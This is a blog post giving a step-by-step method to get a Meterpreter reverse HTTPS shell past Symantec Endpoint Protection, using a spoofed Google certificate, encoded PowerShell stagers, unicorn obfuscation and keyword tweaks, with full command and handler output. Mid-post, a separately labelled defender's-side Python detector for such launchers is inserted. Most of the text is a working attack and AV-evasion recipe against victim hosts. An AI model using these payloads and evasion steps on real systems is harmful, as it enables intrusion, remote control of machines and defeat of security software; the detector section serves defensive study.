Sunday, August 11, 2019

SEP AV Bypass For Meterpreter

Here is a simple method to stop Symantec Endpoint Protection (SEP) AV from detecting Meterpreter. The technique is not unique and has been documented on other blogs. I take no credit for it, but it is still worth its salt, as I had some success with it during my engagements. It is really useful when you have gained a foothold on a victim host but can't disable the AV because you don't have the password. Remember, most AV engines require an additional password to be disabled, even when you already have SYSTEM privileges. So the next best thing you can do is try to bypass it. As long as you do not touch disk and execute code only in memory, you have a fair chance of evading the AV, but the HIPS (host IPS) component can be a pain, so I found this technique documented here. The difference is that I used unicorn to further obfuscate the payload in ps1 format.

1. Firstly, the AV will most certainly catch the default certificate used by msf. To get around it, generate a fake certificate with the impersonate_ssl auxiliary module in msfconsole (here it copies the certificate fields presented by www.google.com).

> set rhosts www.google.com
rhosts => www.google.com
msf5 auxiliary(gather/impersonate_ssl) > run
[*] Running module against 172.217.166.132

[*] 172.217.166.132:443 - Connecting to 172.217.166.132:443
[*] 172.217.166.132:443 - Copying certificate from 172.217.166.132:443
/OU=No SNI provided; please fix your client./CN=invalid2.invalid 
[*] 172.217.166.132:443 - Beginning export of certificate files
[*] 172.217.166.132:443 - Creating looted key/crt/pem files for 172.217.166.132:443
[+] 172.217.166.132:443 - key: /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__624209.key
[+] 172.217.166.132:443 - crt: /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__236829.crt
[+] 172.217.166.132:443 - pem: /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__976059.pem
[*] Running module against 2404:6800:4001:80f::2004
[*] 2404:6800:4001:80f::2004:443 - Connecting to 2404:6800:4001:80f::2004:443
[-] 2404:6800:4001:80f::2004:443 - 2404:6800:4001:80f::2004:443 No certificate subject or CN found
[*] Auxiliary module execution completed


2. Now generate the payload. I use reverse HTTPS with the fake cert from step 1, and set stagerverifysslcert so the stager only completes staging against a handler presenting that cert.

msf5 auxiliary(gather/impersonate_ssl) > use payload/windows/meterpreter/reverse_https
msf5 payload(windows/meterpreter/reverse_https) > show options 

Module options (payload/windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.8.103    yes       The local listener hostname
   LPORT     443              yes       The local listener port
   LURI                       no        The HTTP Path

msf5 payload(windows/meterpreter/reverse_https) > set handlersslcert /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__976059.pem
handlersslcert => /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__976059.pem
msf5 payload(windows/meterpreter/reverse_https) > set stagerverifysslcert true 
stagerverifysslcert => true

msf5 payload(windows/meterpreter/reverse_https) > generate -f psh-cmd
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAG <SNIP SNIP>     ByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==
msf5 payload(windows/meterpreter/reverse_https) > generate -f psh-cmd -o /tmp/works.txt
[*] Writing 7359 bytes to /tmp/works.txt...


3. Use unicorn to obfuscate /tmp/works.txt (saved as /tmp/works.ps1 in the command below). You can remove the leading "%COMSPEC% /b /c start /b /min " from the file before running unicorn.

# python unicorn.py /tmp/works.ps1

Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave

Happy Magic Unicorns.

[*******************************************************************************************************]

    -----Custom PS1 Attack Instructions----

This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro.

Note if choosing the macro option, a large ps1 file may exceed the amount of carriage returns allowed by
VBA. You may change the number of characters in each VBA string by passing an integer as a parameter.

Examples:

python unicorn.py harmless.ps1
python unicorn.py myfile.ps1 macro
python unicorn.py muahahaha.ps1 macro 500

The last one will use a 500 character string instead of the default 380, resulting in less carriage returns in VBA.

[*******************************************************************************************************]
 
[*] Exported powershell output code to powershell_attack.txt

3a. The obfuscated output is now in powershell_attack.txt, which can be run on the victim host with AV.

# cat  /home/gr00t/Downloads/unicorn/powershell_attack.txt

powershell /w 1 /C "s''v Ls -;s''v Ew e''c;s''v ixN ((g''v Ls).value.toString()+(g''v Ew).value.toString());powershell (g''v ixN).value.toString() ('cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlACAAYQBRAEIAbQBBAEMAZwBBAFcAdwBCAEoAQQBHADQAQQBkAEEAQgBRAEEASABRAEEAYwBnAEIAZAB        <SNIP SNIP>      wBCADEAQQBFAGsAQQBWAGcAQgB4AEEASABvAEEAYQB3AEIAcgBBAEcARQBBAGEBAEgAQQBBAFAAUQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFIAQQBCAHAAQQBHAEUAQQBaAHcAQgB1AEEARwA4AEEAYwB3AEIAMABBAEcAawBBAFkAdwBCAHoAQQBDADQAQQBVAEEAQgB5AEEARwA4AEEAWQB3AEIAbABBAEgATQBBAGMAdwBCAGQAQQBEAG8AQQBPAGcAQgBUAEEASABRAEEAWQBRAEIAeQBBAEgAUQBBAEsAQQBBAGsAQQBIAE0AQQBLAFEAQQA3AEEAQQA9AD0ACgA=')"
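As an added defender's-side example (not from the original post), here is a small Python detector that flags the launcher patterns shown above in process-creation command lines: the -e encoded command with -nop -w hidden, and unicorn's split aliases such as s''v and g''v. The sample command lines and the decoded stager prefix are constructed for the example; the thresholds in is_suspicious are an assumption, not a vendor rule.

```python
import base64
import re

# Constructed: decoded prefix of the page's -e stager, re-encoded as PowerShell expects (base64 over UTF-16LE).
STAGER_HEAD = "if([IntPtr]::Size -eq 4){$b='powershell.exe'}"
ENCODED_SAMPLE = base64.b64encode(STAGER_HEAD.encode("utf-16-le")).decode("ascii")

# Constructed process-creation command lines (Sysmon event 1 / Security 4688 style).
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -e " + ENCODED_SAMPLE,
    "powershell /w 1 /C \"s''v Ls -;s''v Ew e''c;s''v ixN ((g''v Ls).value.toString()"
    "+(g''v Ew).value.toString());powershell (g''v ixN).value.toString() ('cABvAHcA')\"",
    "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    "cmd.exe /c dir",
]

# Weaker indicators checked by plain regex; s''v -> sv (Set-Variable), g''v -> gv (Get-Variable).
SIMPLE_CHECKS = [
    ("split-alias", re.compile(r"\b[A-Za-z]+''[A-Za-z]+\b")),
    ("hidden-window", re.compile(r"(?:^|\s)[-/]w(?:indowstyle)?\s+(?:hidden|1)\b", re.I)),
    ("noprofile", re.compile(r"(?:^|\s)[-/]nop(?:rofile)?\b", re.I)),
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 argument.
ENCODED_RE = re.compile(r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Strings that commonly show up once an encoded launcher is decoded.
STAGER_MARKER_RE = re.compile(r"IntPtr\]::Size|DownloadString|FromBase64String|\bIEX\b|Invoke-Expression", re.I)

def decode_encoded_command(b64):
    """Decode an -EncodedCommand argument; None if it is not valid base64 over UTF-16LE."""
    try:
        padded = b64 + "=" * (-len(b64) % 4)
        return base64.b64decode(padded).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(cmdline):
    """Return the indicator names found in one PowerShell command line."""
    if "powershell" not in cmdline.lower():
        return []
    findings = [name for name, rx in SIMPLE_CHECKS if rx.search(cmdline)]
    match = ENCODED_RE.search(cmdline)
    if match:
        findings.append("encoded-command")
        decoded = decode_encoded_command(match.group(1))
        if decoded and STAGER_MARKER_RE.search(decoded):
            findings.append("decoded-stager-markers")
    return findings

def is_suspicious(findings):
    """Alert on any encoding/obfuscation, or on two or more weaker indicators (assumed threshold)."""
    return "split-alias" in findings or "encoded-command" in findings or len(findings) >= 2
```

Run it over your own command-line telemetry with `for c in lines: print(is_suspicious(analyze(c)), analyze(c))`; the benign -NoProfile -File line in the sample stays below the threshold while both launcher forms trip it.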



3b. Now use msfconsole's multi/handler to catch the reverse HTTPS shell, then execute powershell_attack.txt on the victim host, after first modifying the value.toString() keywords (e.g. to vAlue.ToString()) to avoid AV detection.

msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.8.106    yes       The local listener hostname
   LPORT     443              yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

meterpreter > exploit

[*] Started HTTPS reverse handler on https://192.168.8.106:443
[*] https://192.168.8.106:443 handling request from 192.168.8.104; (UUID: qbdxxru2) Meterpreter will verify SSL Certificate with SHA1 hash e27a4b10aeea1b1e22a1ee86d9a6d7f0584d08e9
[*] https://192.168.8.106:443 handling request from 192.168.8.104; (UUID: qbdxxru2) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 4 opened (192.168.8.106:443 -> 192.168.8.104:50302) at 2019-03-19 17:08:05 +0800

meterpreter > sysinfo
Computer        : DESKTOP-O7UQ1HA
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows


4. On the victim host, you'll notice that the AV did not trigger.